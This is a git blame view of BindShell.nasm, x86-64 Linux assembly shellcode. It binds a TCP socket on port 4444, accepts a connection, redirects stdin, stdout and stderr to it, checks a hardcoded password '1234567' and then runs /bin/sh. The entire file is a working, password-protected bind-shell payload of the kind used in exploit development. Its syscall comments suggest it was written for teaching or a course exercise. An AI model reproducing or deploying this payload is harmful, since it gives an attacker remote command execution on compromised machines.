BindShell.nasm 1.46 KB
Newer Older
André Lima's avatar
André Lima committed
1 2 3 4 5 6 7 8 9
global _start

_start:

	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41 

André Lima's avatar
André Lima committed
10 11 12 13 14 15 16
	push 41
	pop rax
	push 2
	pop rdi
	push 1
	pop rsi
	cdq
André Lima's avatar
André Lima committed
17
	syscall
André Lima's avatar
André Lima committed
18
	
André Lima's avatar
André Lima committed
19 20
	; copy socket descriptor to rdi for future use 

André Lima's avatar
André Lima committed
21
	xchg rdi,rax
André Lima's avatar
André Lima committed
22

André Lima's avatar
André Lima committed
23 24 25 26 27
	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = INADDR_ANY
	; bzero(&server.sin_zero, 8)

André Lima's avatar
André Lima committed
28 29 30 31 32
	push rdx
	mov dx,0x5c11
	shl rdx,16
	xor dl,0x2
	push rdx
André Lima's avatar
André Lima committed
33 34 35 36 37

	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
	; syscall number 49

	mov rsi, rsp
André Lima's avatar
André Lima committed
38 39 40
	mov al,49
	push 16
	pop rdx
André Lima's avatar
André Lima committed
41 42 43 44 45
	syscall

	; listen(sock, MAX_CLIENTS)
	; syscall number 50

André Lima's avatar
André Lima committed
46 47 48 49
	push 50
	pop rax
	push 2
	pop rsi
André Lima's avatar
André Lima committed
50 51 52 53 54
	syscall

	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
	; syscall number 43

André Lima's avatar
André Lima committed
55 56 57 58 59 60
	mov al,43
	sub rsp,16
	mov rsi,rsp
	push 16
	mov rdx,rsp
	syscall
André Lima's avatar
André Lima committed
61

André Lima's avatar
André Lima committed
62 63 64 65
	; close parent
	;push 3
	;pop rax
	;syscall
André Lima's avatar
André Lima committed
66

André Lima's avatar
André Lima committed
67
	; duplicate sockets
André Lima's avatar
André Lima committed
68

André Lima's avatar
André Lima committed
69 70 71 72 73 74 75 76 77
	; dup2 (new, old)
	xchg rdi,rax
	push 3
	pop rsi
dup2cycle:
	mov al, 33
	dec esi
	syscall
	loopnz dup2cycle
André Lima's avatar
André Lima committed
78

André Lima's avatar
André Lima committed
79 80 81 82 83 84 85 86
	; read passcode
	; xor rax,rax - already zeroed from prev cycle
	xor rdi,rdi
	push rax
	mov rsi,rsp
	push 8
	pop rdx
	syscall
André Lima's avatar
André Lima committed
87

André Lima's avatar
André Lima committed
88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109
	; Authentication with password "1234567"
	xchg rcx,rax
	mov rbx,0x0a37363534333231
	push rbx
	mov rdi,rsp
	repe cmpsb
	jnz wrong_pwd

	; execve stack-method

	push 59
	pop rax
	cdq ; extends rax sign into rdx, zeroing it out
	push rdx
	mov rbx,0x68732f6e69622f2f
	push rbx
	mov rdi,rsp
	push rdx
	mov rdx,rsp
	push rdi
	mov rsi,rsp
	syscall
André Lima's avatar
André Lima committed
110

André Lima's avatar
André Lima committed
111 112
wrong_pwd:
	nop
André Lima's avatar
André Lima committed
113